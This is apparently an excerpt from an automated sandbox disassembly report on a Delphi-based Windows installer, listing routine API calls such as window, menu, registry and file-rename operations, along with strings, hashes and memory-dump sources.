                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                  • API String ID: 3864787166-2767913252
                                                                                  • Opcode ID: 772e457c4e7e16ec9ce5ab26bdb0e10b802e5f206480bd7d3f62baf2d8a8a4b6
                                                                                  • Instruction ID: 52d35f159eb7e49a6a73c28ce760aef31fdd0a78e8d8731c62b104eb33d4fb56
                                                                                  • Opcode Fuzzy Hash: 772e457c4e7e16ec9ce5ab26bdb0e10b802e5f206480bd7d3f62baf2d8a8a4b6
                                                                                  • Instruction Fuzzy Hash: 691115746142409AC740FF76984674E77D1AB5430CF80983FF548AB3A2EB7D9945CB1E
                                                                                  APIs
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 004135DC
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004135E7
                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 004135F9
                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 0041360C
                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 00413623
                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 0041363A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$Prop
                                                                                  • String ID:
                                                                                  • API String ID: 3887896539-0
                                                                                  • Opcode ID: 0e260baf97035c2fb1a327e0cddcee72e99c7d563cdf3e32a81de897c5579440
                                                                                  • Instruction ID: 48c3be2fd384a86830d7bfd37db498aa4c14b642c54b35f6abe0051a1dadbe73
                                                                                  • Opcode Fuzzy Hash: 0e260baf97035c2fb1a327e0cddcee72e99c7d563cdf3e32a81de897c5579440
                                                                                  • Instruction Fuzzy Hash: 1D110A75500208BFDF00DF99DC84E9A3BA8EB09364F104665F919DB2E2D339E990CB68
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045352B,?,00000000,0045356B), ref: 00453471
                                                                                  Strings
                                                                                  • WININIT.INI, xrefs: 004534A0
                                                                                  • PendingFileRenameOperations, xrefs: 00453410
                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004533F4
                                                                                  • PendingFileRenameOperations2, xrefs: 00453440
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                  • API String ID: 47109696-2199428270
                                                                                  • Opcode ID: ea13cbc723fa349fecd8d24759b3ebb1e03ac86bf24dce4844afb210e481ad4a
                                                                                  • Instruction ID: 006eca101f920ff1bd409a711cba5921e0c3a5f2f85c477065ef9b5d1dc9adc2
                                                                                  • Opcode Fuzzy Hash: ea13cbc723fa349fecd8d24759b3ebb1e03ac86bf24dce4844afb210e481ad4a
                                                                                  • Instruction Fuzzy Hash: 9F51FC30E00208AFDB15EF61DC51ADEB779EF45345F50857BB804A7282EB789F05CA58
                                                                                  APIs
                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00460F51
                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460F77
                                                                                    • Part of subcall function 00460DF4: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00460E8C
                                                                                    • Part of subcall function 00460DF4: DestroyCursor.USER32(00000000), ref: 00460EA2
                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00460FD3
                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460FF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                                  • String ID: c:\directory
                                                                                  • API String ID: 2926980410-3984940477
                                                                                  • Opcode ID: 70fce627e476d48a6615cd5a8a3d230bdf532d41c5f238a8b320070f1587cb25
                                                                                  • Instruction ID: e976d925286e53a837c2283dfc1425734e7ff40815cd5c0fa345b0d5d2bebcbb
                                                                                  • Opcode Fuzzy Hash: 70fce627e476d48a6615cd5a8a3d230bdf532d41c5f238a8b320070f1587cb25
                                                                                  • Instruction Fuzzy Hash: D4417E34604244AFDB21DF55CD8ABDBBBE9EB48304F1084A6F904DB791D678AE80CB59
                                                                                  APIs
                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042DBF0
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DD73,00000000,0042DD8B,?,?,?,?), ref: 0042DC0B
                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DC11
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                  • API String ID: 588496660-1846899949
                                                                                  • Opcode ID: 59f1bc9354b05e9c143018b0c46ff0b96afd5d2fbc71b49f348c8d12b1188b54
                                                                                  • Instruction ID: f8ce20e2f219a78ea18fcbc3070ff8ee73fb5b75d3db43eeb56df99d0aab79b3
                                                                                  • Opcode Fuzzy Hash: 59f1bc9354b05e9c143018b0c46ff0b96afd5d2fbc71b49f348c8d12b1188b54
                                                                                  • Instruction Fuzzy Hash: DBE065F0B41234BAD62426677C49F9B170CC725365FA0493BF105B519295FC4840DF5C
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00476DE2
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 00476DEA
                                                                                  • GetSystemMenu.USER32(00000000,00000000,00000000,00476EAB), ref: 00476E43
                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00476E54
                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00476E6C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: MenuSystem$AppendMetrics
                                                                                  • String ID:
                                                                                  • API String ID: 4092608398-0
                                                                                  • Opcode ID: 405ab67c19f480c05573f54d14e274d1ff7558682cef7fae3d6e1a314ee7f1be
                                                                                  • Instruction ID: fe3821bb039325bff61df73c96a0d0ada7039ad55da2e26f54c6dc74815b5aed
                                                                                  • Opcode Fuzzy Hash: 405ab67c19f480c05573f54d14e274d1ff7558682cef7fae3d6e1a314ee7f1be
                                                                                  • Instruction Fuzzy Hash: 0E31C5303447805AE321FB368C86B9E77959B05318F41887EF905A73D3DA7CAC48875D
                                                                                  APIs
                                                                                  • SetActiveWindow.USER32(?,?,00000000,004781A4,?,?,00000001,?), ref: 00477FA5
                                                                                  • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047801A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ActiveChangeNotifyWindow
                                                                                  • String ID: $Need to restart Windows? %s
                                                                                  • API String ID: 1160245247-4200181552
                                                                                  • Opcode ID: acf08850a17146ad5eb8b09caa40386e6eff47d47537413829680fb16d590d58
                                                                                  • Instruction ID: 8692924bc1fce31e4e7edd363fdd201d6620fd7e9b4d150cc210859d83833276
                                                                                  • Opcode Fuzzy Hash: acf08850a17146ad5eb8b09caa40386e6eff47d47537413829680fb16d590d58
                                                                                  • Instruction Fuzzy Hash: 638180746042449FD700EF69D885B9E77E0EF49304F5084BEE8149B362DB78AD49CB5E
                                                                                  APIs
                                                                                    • Part of subcall function 0042C6CC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C6F0
                                                                                    • Part of subcall function 0042CA74: CharPrevA.USER32(?,00000000,?,00000001,?,?,0042CBA2,00000000,0042CBC8,?,00000001,?,?,00000000,?,0042CC1A), ref: 0042CA9C
                                                                                  • GetLastError.KERNEL32(00000000,00468329,?,?,00000001,0048F038), ref: 00468206
                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00468280
                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004682A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeNotify$CharErrorFullLastNamePathPrev
                                                                                  • String ID: Creating directory: %s
                                                                                  • API String ID: 2168629741-483064649
                                                                                  • Opcode ID: d991cb847ce18b40c7214d27817e66dae437186f77bba07851437db32e987f69
                                                                                  • Instruction ID: 71cc7f23ec24c6a89197ca0e38a6caee4fa0d2e73bf8577012067bc4f078c929
                                                                                  • Opcode Fuzzy Hash: d991cb847ce18b40c7214d27817e66dae437186f77bba07851437db32e987f69
                                                                                  • Instruction Fuzzy Hash: 0F513374E00248ABDB01DFA5C592BDEBBF5AF49304F5085AAEC00B7382DB795E44CB59
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00452B66
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00452C2C), ref: 00452BD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                  • API String ID: 2508298434-591603554
                                                                                  • Opcode ID: 69cf51a007c317ff7f7c307a9037f781f8142a30906a25deb5ed6b1798098020
                                                                                  • Instruction ID: 19231d6bcf0323a170ed938d3a46b4889be1df222fcd9e4161f533f4f1054d07
                                                                                  • Opcode Fuzzy Hash: 69cf51a007c317ff7f7c307a9037f781f8142a30906a25deb5ed6b1798098020
                                                                                  • Instruction Fuzzy Hash: 3C419770A002189BEB25EF15DD85B9E77B8EB05305F1045BBA808A7293D7B89F48CF58
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegCloseKey.ADVAPI32(?,00453737,?,00000001,00000000), ref: 0045372A
                                                                                  Strings
                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004536D8
                                                                                  • PendingFileRenameOperations, xrefs: 004536FC
                                                                                  • PendingFileRenameOperations2, xrefs: 0045370B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                  • API String ID: 47109696-2115312317
                                                                                  • Opcode ID: 6c8687dd0210cac6ec76f5510331334080ad5b01349e202857f98e9577294a01
                                                                                  • Instruction ID: 14b433b3766d66e06ede32aa7f7ba3b5bee8eba80b3e70f27f24866faa3f9aef
                                                                                  • Opcode Fuzzy Hash: 6c8687dd0210cac6ec76f5510331334080ad5b01349e202857f98e9577294a01
                                                                                  • Instruction Fuzzy Hash: 59F062B5A042447BD704DE659C13B1AB79CD748796FB084BAF800C6682EA79AE04551C
                                                                                  APIs
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0046A509,?,00000000,?,00000001,00000000,0046A6D7,?,00000000,?,00000000,?,0046A892), ref: 0046A4E5
                                                                                  • FindClose.KERNEL32(000000FF,0046A510,0046A509,?,00000000,?,00000001,00000000,0046A6D7,?,00000000,?,00000000,?,0046A892,?), ref: 0046A503
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0046A62B,?,00000000,?,00000001,00000000,0046A6D7,?,00000000,?,00000000,?,0046A892), ref: 0046A607
                                                                                  • FindClose.KERNEL32(000000FF,0046A632,0046A62B,?,00000000,?,00000001,00000000,0046A6D7,?,00000000,?,00000000,?,0046A892,?), ref: 0046A625
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileNext
                                                                                  • String ID:
                                                                                  • API String ID: 2066263336-0
                                                                                  • Opcode ID: 7aa48e2fdb10940a317372f94aea696b6e54c11eaea1ff19ebd1619e5cc8d2ac
                                                                                  • Instruction ID: ab1fa9e3f9ff534c7200d2115dc1c9e2470e63c2f287e6bf56e829666cab355f
                                                                                  • Opcode Fuzzy Hash: 7aa48e2fdb10940a317372f94aea696b6e54c11eaea1ff19ebd1619e5cc8d2ac
                                                                                  • Instruction Fuzzy Hash: 6AB13B7490424DAFCF11DFA5C881ADEBBB9BF48304F5081AAE848B3251D7389E56CF56
                                                                                  APIs
                                                                                  • GetMenu.USER32(00000000), ref: 004212D9
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 004212F6
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 0042132B
                                                                                  • SetMenu.USER32(00000000,00000000), ref: 00421347
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu
                                                                                  • String ID:
                                                                                  • API String ID: 3711407533-0
                                                                                  • Opcode ID: a5de1927a1af5fffd0cc3c055ef806800334e8a781e8f11cfca4bf963eba9aaa
                                                                                  • Instruction ID: 5d0afadfc366d603d025481fdb0b824a4274b2f0b9f7477a837aa4a03b75c2bd
                                                                                  • Opcode Fuzzy Hash: a5de1927a1af5fffd0cc3c055ef806800334e8a781e8f11cfca4bf963eba9aaa
                                                                                  • Instruction Fuzzy Hash: 56419F3070026457EB20AB6AA88579B76964B65308F8805BFFC45EF3A7CA7CCC45876D
                                                                                  APIs
                                                                                  • 74D41520.VERSION(00000000,?,?,?,?), ref: 00450574
                                                                                  • 74D41500.VERSION(00000000,?,00000000,?,00000000,004505EF,?,00000000,?,?,?,?), ref: 004505A1
                                                                                  • 74D41540.VERSION(?,00450674,?,?,00000000,?,00000000,?,00000000,004505EF,?,00000000,?,?,?,?), ref: 004505BB
                                                                                  • 74D41540.VERSION(00000000,00450674,?,?,00000000,00450662,?,00000000,?,?,?,?), ref: 0045062E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: D41540$D41500D41520
                                                                                  • String ID:
                                                                                  • API String ID: 2850285092-0
                                                                                  • Opcode ID: 0abf5a8cb05cc4a0e63f183ee2025cb8e165b0d5a8f68163c35169a07c151813
                                                                                  • Instruction ID: 0771cb71047848819f593295279aa92484eb6fd4810fd9e8c00244e4e157a2d5
                                                                                  • Opcode Fuzzy Hash: 0abf5a8cb05cc4a0e63f183ee2025cb8e165b0d5a8f68163c35169a07c151813
                                                                                  • Instruction Fuzzy Hash: 91317275A00508AFDB01DAA9CC41EAFB7FCEB89701F554576FC04E3281D6799E04CB69
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,00000000,00000000,00000000,0044A56F,?,?,?,?), ref: 0044A4C3
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044A4E9
                                                                                  • DrawTextA.USER32(?,00000000,00000000,00000000,00000000), ref: 0044A516
                                                                                  • 73A1A480.USER32(00000000,?,0044A53B,0044A534,?,00000000,00000000,00000000,00000000,0044A56F,?,?,?,?), ref: 0044A52E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A480A570DrawObjectSelectText
                                                                                  • String ID:
                                                                                  • API String ID: 1593990899-0
                                                                                  • Opcode ID: 14f9c5f1838cddefdd350fee9f61739723104733f562635c918e36dfa8683f12
                                                                                  • Instruction ID: 16f25d69e9f7e8ae276b289f314b257ebbe30d07fab5c4e07d199c72e4450f29
                                                                                  • Opcode Fuzzy Hash: 14f9c5f1838cddefdd350fee9f61739723104733f562635c918e36dfa8683f12
                                                                                  • Instruction Fuzzy Hash: 1D316170A44208BFEB01DBA9C945F9EBBF9EB48304F5184A6F504E7291D77C9E50CB19
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416AFC
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416B16
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416B30
                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B58
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 601730667-0
                                                                                  • Opcode ID: 8d3c16cb28f055b666eea41ce4f41727f2033bae4d0c93ca12ee08a3210dfc01
                                                                                  • Instruction ID: fa973bb518cb1bd1a166acbf928c5ab959c129d320d7557fa9d75c1b5488a6d8
                                                                                  • Opcode Fuzzy Hash: 8d3c16cb28f055b666eea41ce4f41727f2033bae4d0c93ca12ee08a3210dfc01
                                                                                  • Instruction Fuzzy Hash: 5C1151B2604A10AFD710EE6ECCC5E9773ECEF49700B15842AB55ADB642C638F8418B28
                                                                                  APIs
                                                                                  • EnumWindows.USER32(00423994), ref: 00423A20
                                                                                  • GetWindow.USER32(?,00000003), ref: 00423A35
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423A44
                                                                                  • SetWindowPos.USER32(00000000,004240D4,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424123,?,?,00423CEB), ref: 00423A7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnumLongWindows
                                                                                  • String ID:
                                                                                  • API String ID: 4191631535-0
                                                                                  • Opcode ID: b9294343cfc6a6da5745ddc9ce8b1ba63cdb640ee437e5a3a1a13365e14f6f09
                                                                                  • Instruction ID: b764ba4eb0c3933b8f3dfc4de3f8816c0ad177aa4f2fffa45b6062f4899d932e
                                                                                  • Opcode Fuzzy Hash: b9294343cfc6a6da5745ddc9ce8b1ba63cdb640ee437e5a3a1a13365e14f6f09
                                                                                  • Instruction Fuzzy Hash: B3115A70704610ABDB10DF28DC89F5A73E8EB48725F10026AF9A4AB2E2C3789D40CB58
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,?,?,00000000,?,00418F4B,00000000,?,?,?,00000001), ref: 00423096
                                                                                  • EnumFontsA.GDI32(00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000,?,?,?,00000001), ref: 004230A9
                                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000), ref: 004230B1
                                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FE0,004105C8,00000000,?,?,00000000,?,00418F4B,00000000), ref: 004230BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: A24620A480A570EnumFonts
                                                                                  • String ID:
                                                                                  • API String ID: 2630238358-0
                                                                                  • Opcode ID: 5e9af35b5c08916e39bbb79d58913440b95fef8d49dcf58b196377fd5ec57848
                                                                                  • Instruction ID: 7ff854ccd2278df99521deba3c09704501477408b87f0924b617577f1d806cf3
                                                                                  • Opcode Fuzzy Hash: 5e9af35b5c08916e39bbb79d58913440b95fef8d49dcf58b196377fd5ec57848
                                                                                  • Instruction Fuzzy Hash: F401D2617047006BE700AF694CC2B9A7B64DF06308F40417BF904BF3C6D6BE9808476E
                                                                                  APIs
                                                                                    • Part of subcall function 0040335C: GetModuleHandleA.KERNEL32(00000000,0048BF5A), ref: 00403363
                                                                                    • Part of subcall function 0040335C: GetCommandLineA.KERNEL32(00000000,0048BF5A), ref: 0040336E
                                                                                    • Part of subcall function 00409AF0: 6F551CD0.COMCTL32(0048BF69), ref: 00409AF0
                                                                                    • Part of subcall function 004108CC: GetCurrentThreadId.KERNEL32 ref: 0041091A
                                                                                    • Part of subcall function 00418FB8: GetVersion.KERNEL32(0048BF7D), ref: 00418FB8
